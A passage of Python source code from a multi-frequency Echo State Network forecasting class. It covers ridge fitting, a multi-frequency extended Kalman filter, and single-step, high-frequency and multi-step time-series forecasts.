if debug: print(\". Packing result\")\n\n #j = 0\n #Sigma_eps_opt = []\n #for Nz_j in Nz:\n # L_Sigma_eps_j = matrh(res_X[j:(j + Nz_j*(Nz_j+1)//2)], Nz_j)\n # Sigma_eps_j = L_Sigma_eps_j @ L_Sigma_eps_j.T\n # Sigma_eps_opt.append(Sigma_eps_j)\n # j += Nz_j*(Nz_j+1)//2\n #L_Sigma_eta = matrh(res_X[j:(j + Ny*(Ny+1)//2)], Ny)\n #Sigma_eta_opt = L_Sigma_eta @ L_Sigma_eta.T\n\n j = 0\n Sigma_eps_opt = []\n for Nz_j in Nz:\n Sigma_eps_opt.append(res_X[j:(j + Nz_j)])\n j += Nz_j\n Sigma_eta_opt = res_X[j:(j + Ny)]\n\n # Fit objects\n (logLike, X_prd, X_flt, M_t, P_t) = MF_EKF_diag_logLike(xu)\n\n #print(logLike)\n\n Y_1 = pd.DataFrame(data=Ys1, index=Y_dates[(1):])\n Y_fitKF_1 = pd.DataFrame(\n data=np.reshape(W_w.T @ X_prd + W_a[:,None], Ys1.shape),\n index=Y_dates[(1):],\n )\n Residuals_KF_1 = Y_1 - Y_fitKF_1\n RSS_KF_1 = np.sum(Residuals_KF_1 ** 2)\n\n esnmulti_fitKF_for = [{\n 's': 1,\n 'W': pre_W,\n 'Y_fit': Y_fitKF_1,\n 'Residuals': Residuals_KF_1,\n 'RSS': RSS_KF_1,\n 'Y': Y_1,\n #'V': V_fit_s,\n #'X': X,\n 'X_predict': X_prd,\n 'X_filter': X_flt,\n 'M_t': M_t,\n 'P_t': P_t,\n 'Sigma_eps': Sigma_eps_opt,\n 'Sigma_eta': Sigma_eta_opt,\n },]\n\n # Output\n fitKF_out = {\n 'model': 'ESNMultiFrequency',\n 'fitKF_for': esnmulti_fitKF_for,\n #'fit_comp_ar': W_comps_ar,\n 'steps': 1,\n 'dates': Y_dates,\n 'models': len(self.models_),\n 'model_N': self.models_N_,\n 'method': method,\n 'Lambda': Lambda,\n 'init': init,\n #'state_tuple': X,\n #'pca': pca,\n #'end_state': X_multi[-1,],\n 'washout_len': washout_len,\n }\n\n return fitKF_out\n\n def fit_components_ar(self, z, method='ridge', Lambda=0, init=None, washout_len=0):\n \"\"\"\n Fit a full (i.e. all series) autoregressive model for each indvidual model/dataset\n \"\"\"\n\n # Flatter data and extract datetime indexes\n z_dates = []\n z_ = [] \n #assert len(z) > 0\n if len(z) > 0:\n for zj in z:\n zj_dates = zj.index\n zj_ = esn_data_to_nparray(zj)\n if zj_ is None:\n raise TypeError(\"Type of z not recognized, need pandas.DataFrame or numpy.ndarray\")\n assert isinstance(zj_dates, pd.DatetimeIndex)\n\n z_dates.append(zj_dates)\n z_.append(zj_)\n # Make immutable\n z_dates = tuple(z_dates)\n z_ = tuple(z_)\n\n # Check model number vs data\n assert len(self.models_) == len(z), \"Number of ESN models does not correspond to number of data series\"\n \n # States\n init = [None for _ in range(len(z))] if init is None else init\n assert len(init) == len(self.models_), \"Length of initialization 'init' must be equal to the number of ESN models\"\n\n assert len(Lambda) == len(self.models_), \"Lambda is not scalar, must have same length as number of models\"\n\n # Fit\n esnmulti_fit_comp_ar = []\n for j, zj_ in enumerate(z_):\n # States\n Xj = self.models_[j].base_generate_states(\n z=zj_, init=init[j], washout_len=washout_len\n )\n # Regression\n Ys = zj_[1:,]\n Xs = Xj[0:-1,]\n\n Ws = None\n if (method == 'none') or (method is None):\n Ws = np.ones((Xj.shape[1], 1)) \n elif method == 'ridge':\n Ws = ls_ridge(Y=Ys, X=Xs, Lambda=Lambda[j])\n else:\n raise ValueError(\"Fitting method not defined\")\n\n # Fit objects\n V_fit_s = np.hstack((np.ones((Xs.shape[0], 1)), Xs))\n\n Ys = pd.DataFrame(data=Ys, index=z_dates[j][1:])\n Y_fit_s = pd.DataFrame(data=V_fit_s @ Ws, index=z_dates[j][1:])\n Residuals_s = Ys - Y_fit_s\n RSS_s = np.sum(Residuals_s.to_numpy() ** 2)\n\n esnmulti_fit_comp_ar.append({\n 'j': j,\n 'W': Ws,\n 'Y_fit': Y_fit_s,\n 'Residuals': Residuals_s,\n 'RSS': RSS_s,\n 'Y': Ys,\n 'V': V_fit_s,\n 'X': Xs,\n })\n\n # Output\n fit_out = {\n 'model': 'ESNMultiFrequency_FullComponentsAR',\n 'fit_comp_ar': esnmulti_fit_comp_ar,\n 'models': len(self.models_),\n 'model_N': self.models_N_,\n 'method': method,\n 'Lambda': Lambda,\n 'init': init,\n 'washout_len': washout_len,\n }\n\n return fit_out\n\n\n def fit_multistep(self, Y, z, steps=1, method='ridge', Lambda=0, \n init=None, washout_len=0, debug=True):\n \"\"\"\n Fit an ESN multi-frequency model for autonomous multiple-step forecasting. \n States are first collected, and a \"full\" target regression is fitted to\n allow for autonomous state iteration. Then for each step (i.e. horizon)\n a specific target weigth matrix is estimated.\n \"\"\"\n # Flatter data and extract datetime indexes\n Y_, Y_dates, z_, z_dates = self.prep_data(Y, z)\n\n # Check model number vs data\n assert len(self.models_) == int(self.ar_) + len(z), \"Number of ESN models does not correspond to number of data series\"\n\n # States\n init = [None for _ in range(int(self.ar_) + len(z))] if init is None else init\n assert len(init) == len(self.models_), \"Length of initialization 'init' must be equal to the number of ESN models\"\n \n X = self.multifreq_states(\n Y=Y_, z=z_, Y_dates=Y_dates, z_dates=z_dates,\n init=init, washout_len=0,\n )\n\n # States matrix\n #X_multi = self.multifreq_states_to_matrix(\n # ref_dates=Y_dates, states=X,\n #)\n\n # Ridge penalty for each step\n Lambda_s = []\n if not Lambda is None:\n if len(tuple(Lambda)) == 1:\n Lambda = [np.atleast_1d(np.array(Lambda)) for _ in range(steps)]\n else:\n assert len(Lambda) == steps, f\"Lambda must have same length as steps, {steps}, found {len(Lambda)}\"\n for j in range(len(Lambda)):\n assert len(Lambda[j]) == len(self.models_), f\"Penalty array Lambda[{j}] should have length {len(self.models_)}, found {len(Lambda[j])}\"\n d = np.zeros(sum(self.states_N_))\n i = 0\n for n, k in enumerate(self.states_N_):\n d[i:(i+k)] = (Lambda[j])[n] * np.ones(k)\n i += k\n Lambda_s.append(np.diagflat(d))\n #print(d)\n\n # (1) Fit \"full\" individual reservoir models\n W_comps_full = []\n for j, Xj in enumerate(X):\n if self.ar_:\n Z1s_j = Y_[1:,] if j == 0 else z_[j-1][1:,]\n else:\n Z1s_j = z_[j][1:,]\n X0s_j = Xj.iloc[0:-1,].to_numpy()\n # \n if (method == 'none') or (method is None):\n W_comps_full.append(np.zeros((X0s_j.shape[1], 1)))\n elif method == 'least_squares':\n W_comps_full.append(ls_ridge(Y=Z1s_j, X=X0s_j, Lambda=0))\n elif method == 'ridge':\n W_comps_full.append(ls_ridge(Y=Z1s_j, X=X0s_j, Lambda=Lambda_s[0][j]))\n else:\n raise ValueError(\"Fitting method not defined\")\n\n # Fit\n assert steps > 0, \"Forecasting steps must be > 0\"\n\n # State reference dates\n ref_dates = Y_dates\n ref_dates_0 = Y_dates\n\n W_multistep = []\n esnmulti_fit_multistep = []\n for s in range(steps):\n # Construct the correct low-freq state index\n ref_dates_s = ref_dates[0:(-1-s)]\n\n # States\n X_ms_multi = np.full((len(ref_dates_s), self.M_), np.nan)\n p = 0\n for j, x_j in enumerate(X):\n ks = 0\n for i, d in enumerate(ref_dates_s):\n cpd, ks = closest_past_date(x_j.index, d, cutoff=ks)\n # Target date\n tgd = ref_dates_0[i]\n # State forward iterations \n iter_x_j = len(x_j.loc[cpd:tgd,])\n # Generate states\n init_x_j = np.squeeze(x_j.loc[cpd,].to_numpy())\n Xj, _ = self.models_[j].base_generate_autostates(\n #T=s+1,\n T=iter_x_j, \n W=W_comps_full[j], init=init_x_j\n )\n #\n #if i == s:\n #plt.plot(Xj)\n #plt.show()\n #\n X_ms_multi[i,p:(p+self.models_N_[j])] = np.squeeze(Xj[-1,])\n p += self.models_N_[j]\n\n # Target\n Y_ms = Y_[(1+s):,]\n\n # Fit\n if (method == 'none') or (method is None):\n W_multistep.append(np.zeros((1 + X_ms_multi.shape[1], 1))) \n elif method == 'least_squares':\n W_multistep.append(ls_ridge(Y=Y_ms, X=X_ms_multi, Lambda=0))\n elif method == 'ridge':\n W_multistep.append(ls_ridge(Y=Y_ms, X=X_ms_multi, Lambda=Lambda_s[s]))\n else:\n raise ValueError(\"Fitting method not defined\")\n\n # Compute fit objects\n V_fit_ms = np.hstack((np.ones((X_ms_multi.shape[0], 1)), X_ms_multi))\n Y_fit_ms = pd.DataFrame(data=V_fit_ms @ W_multistep[s], index=Y_dates[(1+s):])\n Y_ms = pd.DataFrame(data=Y_ms, index=Y_dates[(1+s):])\n Residuals_ms = Y_ms - Y_fit_ms\n RSS_ms = np.sum(Residuals_ms.to_numpy() ** 2)\n\n esnmulti_fit_multistep.append({\n 's': s+1,\n 'W': W_multistep[s],\n 'Y_fit': Y_fit_ms,\n 'Residuals': Residuals_ms,\n 'RSS': RSS_ms,\n 'Y': Y_ms,\n 'V': V_fit_ms,\n 'X': X_ms_multi,\n })\n\n # Output\n fit_out = {\n 'model': 'ESNMultiFrequency_MultiStep',\n 'fit_for': esnmulti_fit_multistep,\n 'fit_comp_ar': W_comps_full,\n 'steps': steps,\n 'dates': Y_dates,\n 'models': len(self.models_),\n 'model_N': self.models_N_,\n 'method': method,\n 'Lambda': Lambda,\n 'init': init,\n 'washout_len': washout_len,\n 'state_tuple': X,\n 'pca': None,\n #'end_state': X_multi[-1,],\n }\n\n return fit_out\n\n def fit_now(self, Y, z, method='ridge', Lambda=0, init=None, washout_len=0):\n # Flatter data and extract datetime indexes\n Y_, Y_dates, z_, z_dates = self.prep_data(Y, z)\n\n # Check model number\n assert len(self.models_) == 1 + len(z), \"Number of ESN models needs to be exactly 1 + [number of regressors in z]\"\n\n # States\n init = [None for _ in range(1+len(z))] if init is None else init\n assert len(init) == 1 + len(z), \"Length of initialization 'init' must be exactly 1 + [number of regressors in z]\"\n\n X = self.multifreq_states(\n Y=Y_, z=z_, Y_dates=Y_dates, z_dates=z_dates,\n init=init, washout_len=0,\n )\n\n # Add state init as pre-stat\n # NOTE: this is currently a hack, as the date assigned \n # to pre-states is always '1800-01-01' to make sure they\n # always have the earliest Datetime.\n X_mod = []\n for Xj in X:\n pre_Xj = pd.DataFrame(\n data=(np.zeros(Xj.shape[1]),), columns=Xj.columns,\n index=pd.DatetimeIndex(('1800-01-01',))\n )\n X_mod.append(pre_Xj.append(Xj))\n #\n X = X_mod\n\n # Find maximal frequency dates\n max_freq = pd.infer_freq(z_dates[0])\n max_periods = infer_periods(max_freq)\n max_freq_dates = z_dates[0]\n for d in z_dates:\n d_f = pd.infer_freq(d)\n p_f = infer_periods(d_f)\n if p_f > max_periods:\n max_freq = d_f\n max_periods = p_f\n max_freq_dates = d\n\n # States matrix\n #X_multi = self.multifreq_states_to_matrix(\n # ref_dates=max_freq_dates, states=X, states_dates=z_dates,\n #)\n\n return None\n\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # ESN Forecasting\n def fixedParamsForecast(self, Yf, zf, fit, steps=None, init=None):\n \"\"\"\n Given a multi-frequency ESNMulti fit compute forecasts of future\n data (Yf, zf) without updating parameters.\n \"\"\"\n\n # Flatter data and extract datetime indexes\n Yf_, Yf_dates, zf_, zf_dates = self.prep_data(Yf, zf)\n\n # Check model number vs data\n assert len(self.models_) == int(self.ar_) + len(zf), \"Number of ESN models does not correspond to number of data series\"\n\n # States\n if init is None:\n init = []\n for_dates = (Yf_dates, ) + zf_dates if self.ar_ else zf_dates\n for j, x_j in enumerate(fit['state_tuple']):\n d = for_dates[j][0]\n cpd, _ = closest_past_date(x_j.index, d - pd.Timedelta(microseconds=1))\n init.append(np.squeeze(x_j.loc[cpd].to_numpy()))\n\n Xf = self.multifreq_states(\n Y=Yf_, z=zf_, Y_dates=Yf_dates, z_dates=zf_dates,\n init=init, washout_len=0\n )\n\n # Multifrequency state matrix\n Xf_dates = fit['dates'][[-1]].union(Yf_dates)\n Xf_multi = self.multifreq_states_to_matrix(\n ref_dates=Xf_dates, states=Xf,\n )\n\n # Stack initial step\n #Xf_multi = np.vstack(((fit['X'])[-1,], Xf_multi[:-1,]))\n\n # Load training states (necessary for steps > 1)\n V_train = fit['fit_for'][0]['V']\n\n # PCA\n if not fit['pca'] is None:\n Xf_multi = fit['pca'].transform(Xf_multi)\n # NOTE: below is the \"wrong\" time-dimension \"PCA\"\n #pcaf = PCA(n_components=len(fit['fit_for'][0]['W'])-1)\n #Xf_multi = pcaf.fit(Xf_multi.T).components_.T\n\n # Compute forecast\n steps = steps if (not steps is None) and (int(steps) <= fit['steps']) else fit['steps']\n assert steps > 0, \"Forecasting steps must be > 0\"\n\n Forecast = []\n for s in range(steps):\n # Slice matrices\n Xf_s = Xf_multi[0:(-1-s),]\n Vf_for_s = np.hstack((np.ones((Xf_s.shape[0], 1)), Xf_s))\n if s > 0:\n Vf_for_s = np.vstack((V_train[(-s):,], Vf_for_s))[:len(Yf_dates),]\n \n W_s = fit['fit_for'][s]['W']\n \n #Yf_s = pd.DataFrame(data=Yf_[s:,], index=Yf_dates[s:])\n #Yf_for_s = pd.DataFrame(data=Vf_for_s @ W_s, index=Yf_dates[s:])\n Yf_s = Yf\n Yf_for_s = pd.DataFrame(data=Vf_for_s @ W_s, index=Yf_dates)\n Errors_s = Yf_s - Yf_for_s\n FESS_s = np.sum(Errors_s.to_numpy() ** 2)\n\n Forecast.append({\n 's': s+1,\n 'W': W_s,\n 'Y_for': Yf_for_s,\n 'Errors': Errors_s,\n 'FESS': FESS_s,\n 'Y': Yf_s,\n 'V': Vf_for_s,\n 'X': Xf_s,\n })\n\n # Output\n for_out = {\n 'model': 'ESNMultiFrequency',\n 'Forecast': Forecast,\n 'dates': Yf_dates,\n 'models': len(self.models_),\n 'model_N': self.models_N_,\n 'method': fit['method'],\n 'init': init,\n }\n\n return for_out\n\n def fixedParamsHighFreqForecast(self, Yf, zf, fit, steps=None, init=None):\n \"\"\"\n Given a multi-frequency ESNMulti fit compute high-frequency forecasts \n of future data (Yf, zf) without updating parameters.\n \"\"\"\n\n # Flatter data and extract datetime indexes\n Yf_, Yf_dates, zf_, zf_dates = self.prep_data(Yf, zf)\n\n # Check model number vs data\n assert len(self.models_) == int(self.ar_) + len(zf), \"Number of ESN models does not correspond to number of data series\"\n \n # States\n X_dates = [] # need to recover fit state dates\n if init is None:\n init = []\n for_dates = (Yf_dates, ) + zf_dates if self.ar_ else zf_dates\n for j, x_j in enumerate(fit['state_tuple']):\n d = for_dates[j][0]\n cpd, _ = closest_past_date(x_j.index, d - pd.Timedelta(microseconds=1))\n init.append(np.squeeze(x_j.loc[cpd].to_numpy()))\n X_dates.append(x_j.index)\n\n Xf = self.multifreq_states(\n Y=Yf_, z=zf_, Y_dates=Yf_dates, z_dates=zf_dates,\n init=init, washout_len=0\n )\n\n # Stack training states\n Xf_w_init = []\n for j, xf_j in enumerate(Xf):\n #Xf_w_init.append(fit['state_tuple'][j].iloc[:-1,].append(xf_j))\n Xf_w_init.append(pd.concat([fit['state_tuple'][j].iloc[:-1,], xf_j]))\n\n # Multifrequency state matrix\n steps = steps if (not steps is None) and (int(steps) <= fit['steps']) else fit['steps']\n assert steps > 0, \"Forecasting steps must be > 0\"\n\n # Find maximal frequency dates\n max_freq = pd.infer_freq(X_dates[0])\n max_periods = infer_periods(max_freq)\n max_freq_idx = 0\n for i, d in enumerate(X_dates):\n d_f = pd.infer_freq(d)\n p_f = infer_periods(d_f)\n if p_f > max_periods:\n max_freq = d_f\n max_periods = p_f\n max_freq_idx = i\n max_freq_dates = zf_dates[max_freq_idx]\n\n # NOTE: we must make a union with the fit high-freq dates \n max_freq_dates_w_init = (X_dates[max_freq_idx][\n X_dates[max_freq_idx] > fit['dates'][-1-steps]\n ])[:-1].union(max_freq_dates)\n #max_freq_dates_w_init = X_dates[max_freq_idx][:-1].union(max_freq_dates)\n low_freq_dates_w_init = fit['dates'][-1-steps:].union(Yf_dates)\n\n Xf_multi_hf = self.multifreq_states_to_matrix(\n ref_dates=max_freq_dates_w_init, states=Xf_w_init,\n )\n\n # Re-add dates to track states and observations easily\n Xf_hf = pd.DataFrame(data=Xf_multi_hf, index=max_freq_dates_w_init)\n\n # Compute high-frequency forecasts\n # NOTE: we also must identify the max freq dates that are closest to\n # to low freq target dates for slicing\n max2low_freq_dates_w_init = X_dates[max_freq_idx][[0]]\n kt = 0\n for lf_date in low_freq_dates_w_init:\n cpd, kt = closest_past_date(X_dates[max_freq_idx], lf_date, cutoff=kt)\n max2low_freq_dates_w_init = max2low_freq_dates_w_init.union([cpd])\n max2low_freq_dates_w_init = max2low_freq_dates_w_init[1:]\n \n # NOTE: need to be careful to appropriately repeat low-freq\n # target when making high-freq dataframe\n Yf_hf_dates = Xf_hf.index[\n Xf_hf.index >= closest_past_date(zf_dates[max_freq_idx], Yf_dates[0])[0]\n ]\n Yf_hf_s = pd.DataFrame(columns=[0], index=Yf_dates.union(Yf_hf_dates))\n Yf_hf_s.loc[Yf_dates] = Yf\n # Re-align correctly to high-freq \n Yf_hf_s = Yf_hf_s.backfill().loc[Yf_hf_dates]\n\n highFrequencyForecast = []\n for s in range(steps):\n #slice_hs_s = Xf_hf.index[\n # (Xf_hf.index > fit['dates'][(-2-s)]) & (Xf_hf.index <= low_freq_dates_w_init[(-2-s)])\n #]\n slice_hs_s = Xf_hf.index[\n (Xf_hf.index >= max2low_freq_dates_w_init[(-1-s)]) \n & \n (Xf_hf.index <= low_freq_dates_w_init[(-2-s)])\n ]\n\n # Slice matrices\n Xf_hf_s = Xf_hf.loc[slice_hs_s].to_numpy()\n Vf_hf_for_s = np.hstack((np.ones((Xf_hf_s.shape[0], 1)), Xf_hf_s))\n\n W_s = fit['fit_for'][s]['W']\n\n Yf_hf_for_s = pd.DataFrame(data=Vf_hf_for_s @ W_s, index=Yf_hf_dates)\n Errors_s = Yf_hf_s - Yf_hf_for_s\n FESS_s = np.sum(Errors_s.to_numpy() ** 2)\n\n highFrequencyForecast.append({\n 's': s+1,\n 'W': W_s,\n 'Y_for': Yf_hf_for_s,\n 'Errors': Errors_s,\n 'FESS': FESS_s,\n 'Y': Yf_hf_s,\n 'V': Vf_hf_for_s,\n 'X': Xf_hf_s,\n })\n\n # Output\n for_hf_out = {\n 'model': 'ESNMultiFrequency',\n 'highFrequencyForecast': highFrequencyForecast,\n 'dates': Yf_dates,\n 'models': len(self.models_),\n 'model_N': self.models_N_,\n 'method': fit['method'],\n 'init': init,\n }\n\n return for_hf_out\n\n def fixedParamsKFForecast(self, Yf, zf, fit, steps=None):\n # Flatter data and extract datetime indexes\n Yf_, Yf_dates, zf_, zf_dates = self.prep_data(Yf, zf)\n\n # Check model number vs data\n assert len(self.models_) == int(self.ar_) + len(zf), \"Number of ESN models does not correspond to number of data series\"\n\n # Build \"dupe\" states, only need associated indexes\n #pre_Xf = self.multifreq_states(\n # Y=Yf_, z=zf_, Y_dates=Yf_dates, z_dates=zf_dates,\n # init=[None for _ in range(int(self.ar_) + len(zf))], \n # washout_len=0\n #)\n\n # States indexes\n Xf_multi_idx = []\n for j, zf_dj in enumerate(zf_dates):\n if not self.states_lags_ is None:\n idx_j = np.full((1+self.states_lags_[j], len(Yf_dates)), np.nan)\n else:\n idx_j = np.full((1, len(Yf_dates)), np.nan)\n kt = 0\n for t, lf_date_t in enumerate(Yf_dates):\n _, kt = closest_past_date(zf_dj, lf_date_t, cutoff=kt)\n idx_j[0,t] = kt \n if not self.states_lags_ is None:\n for l in range(self.states_lags_[j]):\n idx_j[1+l,t] = kt-1\n # Add 0 index to accound for forecasting inputs\n idx_j = np.c_[np.atleast_2d(np.zeros(1)), idx_j]\n Xf_multi_idx.append(idx_j.astype(int))\n\n # MF-EKF filtering\n Zf = (Yf_, ) + zf_ if self.ar_ else zf_\n\n Yfs1 = Yf_\n\n Ny = Yf_.shape[1]\n Nz = [zfj_.shape[1] for zfj_ in Zf]\n Tf = len(Yf_dates)\n\n # Filter initialization from KF fit\n m0 = fit['fitKF_for'][0]['M_t']\n P0 = fit['fitKF_for'][0]['P_t']\n\n W_a = fit['fitKF_for'][0]['W'][0,:]\n W_w = fit['fitKF_for'][0]['W'][1:,:]\n\n Sigma_eps = fit['fitKF_for'][0]['Sigma_eps']\n Sigma_eta = fit['fitKF_for'][0]['Sigma_eta']\n\n # ESN model parameter aliases\n rho_ = [model.rho_ for model in self.models_]\n A_ = [model.A_ for model in self.models_]\n gamma_ = [model.gamma_ for model in self.models_]\n C_ = [model.C_ for model in self.models_]\n zeta_ = [model.zeta_ for model in self.models_]\n leak_rate_ = [model.leak_rate_ for model in self.models_]\n\n # Multi-Frequency Extended Kalman Filter\n X_prd = np.zeros((self.M_, Tf))\n X_flt = np.zeros((self.M_, Tf))\n L_l_t = np.zeros(Tf)\n LogLike = 0\n\n # Prediction variables\n M0_t = []\n P0_t = P0.copy()\n\n # Update variables\n P_t = P0.copy()\n M_t = m0.copy()\n\n # NOTE: for now, implement only the 'canonical' linearization\n sl = [0 for _ in range(len(zf_))]\n # For each low-frequency period (t-index) from 0 to T-1\n for t in range(Tf):\n m0_t = np.full((self.M_, 1), np.nan)\n # For each reservoir component...\n p = 0\n for j, zfj_ in enumerate(Zf):\n # Prediction: iterate state equations forwards at own freqency (s index)\n m0_s = M_t[j]\n s_range = range(sl[j], Xf_multi_idx[j][0][t]) if (t > 0) else [0,]\n for s in s_range:\n u0_s = (rho_[j] * A_[j]) @ m0_s + (gamma_[j] * C_[j]) @ zfj_[[s],:].T + zeta_[j]\n m0_s = leak_rate_[j] * m0_s + (1 - leak_rate_[j]) * np.tanh(u0_s)\n D_u0_t = 1 - (np.tanh(u0_s) ** 2)\n F_x = leak_rate_[j] * np.eye(self.models_N_[j]) + (1 - leak_rate_[j]) * D_u0_t * rho_[j] * A_[j]\n F_q = (1 - leak_rate_[j]) * D_u0_t * gamma_[j] * C_[j]\n P0_s = F_x @ P_t[j] @ F_x.T + F_q @ np.diagflat(Sigma_eps[j]) @ F_q.T\n P0_s = (P0_s + P0_s.T) / 2\n m0_t[p:(p+self.models_N_[j]),] = m0_s\n P0_t[j] = P0_s\n p += self.models_N_[j]\n # Move s index forward\n sl[j] = Xf_multi_idx[j][0][t]\n # Update: use only last prediction step (s=0 for all j)\n v_t = Yfs1[[t],:].T - (W_w.T @ m0_t + W_a[:,None])\n S_t = W_w.T @ block_diag(*P0_t) @ W_w + np.diagflat(Sigma_eta)\n K_t = block_diag(*P0_t) @ W_w @ np.linalg.inv(S_t)\n m_u_t = m0_t + K_t @ v_t\n P_u_t = block_diag(*P0_t) - K_t @ S_t @ K_t.T\n P_u_t = (P_u_t + P_u_t.T) / 2\n if np.linalg.norm(P_u_t, ord=np.inf) <= 1e-11:\n P_u_t = 1e-12 * np.eye(self.M_)\n # Slice updates to individual reservoirs\n p = 0\n for j in range(len(Zf)):\n M_t[j] = m_u_t[p:(p+self.models_N_[j]),]\n P_t[j] = P_u_t[p:(p+self.models_N_[j]),p:(p+self.models_N_[j])]\n p += self.models_N_[j]\n # Save states\n X_prd[:,t] = np.squeeze(m0_t)\n X_flt[:,t] = np.squeeze(m_u_t)\n # Compute log-likelihood\n L_l_t[t] = multivariate_normal.pdf(\n np.squeeze(Yfs1[[t],:]), \n mean=np.squeeze(W_w.T @ m0_t + W_a[:,None]), cov=S_t\n )\n #\n LogLike = np.sum(np.log(L_l_t + 1e-12))\n\n # Output\n Yf_1 = pd.DataFrame(data=Yfs1, index=Yf_dates)\n Yf_forKF_1 = pd.DataFrame(\n data=np.reshape(W_w.T @ X_prd + W_a[:,None], Yfs1.shape),\n index=Yf_dates,\n )\n Errors_KF_1 = Yf_1 - Yf_forKF_1\n FESS_KF_1 = np.sum(Errors_KF_1 ** 2)\n\n Forecast =[{\n 's': 1,\n 'W': fit['fitKF_for'][0]['W'],\n 'Y_for': Yf_forKF_1,\n 'Errors': Errors_KF_1,\n 'FESS': FESS_KF_1,\n 'Y': Yf_1,\n #'V': Vf_for_s,\n #'X': Xf_s,\n }]\n\n # Output\n forKF_out = {\n 'model': 'ESNMultiFrequency',\n 'Forecast': Forecast,\n 'dates': Yf_dates,\n 'models': len(self.models_),\n 'model_N': self.models_N_,\n 'method': fit['method'],\n #'init': init,\n }\n\n return forKF_out\n\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # ESN Multi-step Forecasting\n def multistepForecast(self, Yf, zf, fit, steps, init=None):\n \"\"\"\n Compute multi-step forecasts.\n \"\"\"\n # NOTE: to compure multi-step forecasts all single-frequency ESNs\n # within a ESNMultiFrequency object must be additionally trained \n # to fit *all* input components. This is necessary to ensure the\n # state equations can be run autonomously.\n\n # Check fit object\n assert 'fit_comp_ar' in fit\n\n # Flatter data and extract datetime indexes\n Yf_, Yf_dates, zf_, zf_dates = self.prep_data(Yf, zf)\n\n # Check model number vs data\n assert len(self.models_) == int(self.ar_) + len(zf), \"Number of ESN models does not correspond to number of data series\"\n\n # States\n if init is None:\n init = []\n for_dates = (Yf_dates, ) + zf_dates if self.ar_ else zf_dates\n for j, x_j in enumerate(fit['state_tuple']):\n d = for_dates[j][0]\n cpd, _ = closest_past_date(x_j.index, d - pd.Timedelta(microseconds=1))\n init.append(np.squeeze(x_j.loc[cpd].to_numpy()))\n\n Xf = self.multifreq_states(\n Y=Yf_, z=zf_, Y_dates=Yf_dates, z_dates=zf_dates,\n init=init, washout_len=0\n )\n\n # Infer regressors frequencies\n #Xf_freq = []\n #for xf_j in Xf:\n # Xf_freq.append(pd.infer_freq(xf_j.index))\n\n # Infer Yf offsets to date multi-steps forecasts\n #Yf_freq = pd.infer_freq(Yf_dates)\n #Yf_date_offset = pd.tseries.frequencies.to_offset(Yf_freq)\n\n # Stack training states\n # NOTE: to produce a consistent multistep forecast (exactly 'steps'\n # forecasts for each target in the 'Yf' argument), we additionally\n # stack the training states to the testing states\n Xf_w_init = []\n for j, xf_j in enumerate(Xf):\n #Xf_w_init.append(fit['state_tuple'][j].iloc[:-1,].append(xf_j))\n Xf_w_init.append(pd.concat([fit['state_tuple'][j].iloc[:-1,], xf_j]))\n\n # Compute multi-step forecast\n #steps = steps if (not steps is None) and (int(steps) <= fit['steps']) else fit['steps']\n assert steps > 0, \"Forecasting steps must be > 0\"\n\n # State reference dates\n ref_dates = fit['dates'].append(Yf_dates)\n ref_index = len(fit['dates']) - 1\n ref_dates_0 = ref_dates[ref_index:]\n\n multistepForecast = []\n for s in range(steps):\n # Construct the correct low-freq state index\n #ref_dates_s = fit['dates'][(-1-s):].append(Yf_dates[0:(-1-s)])\n ref_dates_s = ref_dates[(ref_index - s):(-1-s)]\n\n # States\n #X_ms = []\n X_ms_multi = np.full((len(ref_dates_s), self.M_), np.nan)\n p = 0\n for j, xf_j in enumerate(Xf_w_init):\n ks = 0\n for i, d in enumerate(ref_dates_s):\n cpd, ks = closest_past_date(xf_j.index, d, cutoff=ks)\n # Target date\n tgd = ref_dates_0[i]\n # State forward iterations \n iter_xf_j = len(xf_j.loc[cpd:tgd,])\n # Generate states\n init_xf_j = np.squeeze(xf_j.loc[cpd,].to_numpy())\n Xj, _ = self.models_[j].base_generate_autostates(\n #T=s+1,\n T=iter_xf_j, \n W=fit['fit_comp_ar'][j], init=init_xf_j\n )\n #\n #if False:\n #if s == 2:\n #if i == s and s > 0:\n # plt.figure(figsize=(5, 2))\n # plt.plot(Xj)\n # plt.show()\n #\n X_ms_multi[i,p:(p+self.models_N_[j])] = np.squeeze(Xj[-1,])\n p += self.models_N_[j]\n\n # PCA\n if not fit['pca'] is None:\n X_ms_multi = fit['pca'].transform(X_ms_multi)\n\n # Load coefficients\n if fit['model'] == 'ESNMultiFrequency':\n Ws = fit['fit_for'][0]['W']\n elif fit['model'] == 'ESNMultiFrequency_MultiStep':\n Ws = fit['fit_for'][s]['W']\n else:\n raise TypeError(\"Model type of fit object not recognized\")\n \n # Forecasts\n V_ms_s = np.hstack((np.ones((X_ms_multi.shape[0], 1)), X_ms_multi))\n Y_ms_for_s = pd.DataFrame(data=V_ms_s @ Ws, index=Yf_dates)\n \n multistepForecast.append({\n 's': s+1,\n 'ref_dates': ref_dates_s,\n 'Y_for': Y_ms_for_s,\n 'V': V_ms_s,\n 'X': X_ms_multi,\n #'state_tuple': X_ms,\n })\n\n \n #multistepForecast = []\n #for t, d in enumerate(Yf_dates[1:]):\n # d_plus_steps = d + (steps-1)*Yf_date_offset\n # ref_dates_t = pd.date_range(d, d_plus_steps, freq=Yf_freq)\n\n # # States\n # X_ms = []\n # X_ms_multi = np.full((len(ref_dates_t), self.M_), np.nan)\n # p = 0\n # for j, xf_j in enumerate(Xf_w_init):\n # # Compute dates range\n # d_range_j = pd.date_range(d, d_plus_steps, freq=Xf_freq[j])\n # # NOTE: this is a hack to make sure the cdp is strictly in the past\n # cpd, _ = closest_past_date(xf_j.index, d - pd.Timedelta(microseconds=1))\n # # Generate states\n # init_xf_j = np.squeeze(xf_j.loc[cpd,].to_numpy())\n # Xj, _ = self.models_[j].base_generate_autostates(\n # T=len(d_range_j), \n # W=fit['fit_comp_ar'][j], \n # init=init_xf_j\n # )\n # # Add dates to states\n # Xj = pd.DataFrame(\n # Xj, columns=tuple(map(lambda x : 'C'+str(x), range(Xj.shape[1]))),\n # index=d_range_j\n # )\n # X_ms.append(Xj)\n # #\n # ks = 0\n # for s, lf_date_t in enumerate(ref_dates_t):\n # #cpd, _ = closest_past_date(states_dates[j-1], lf_date_t)\n # cpd, ks = closest_past_date(Xj.index, lf_date_t, cutoff=ks)\n # 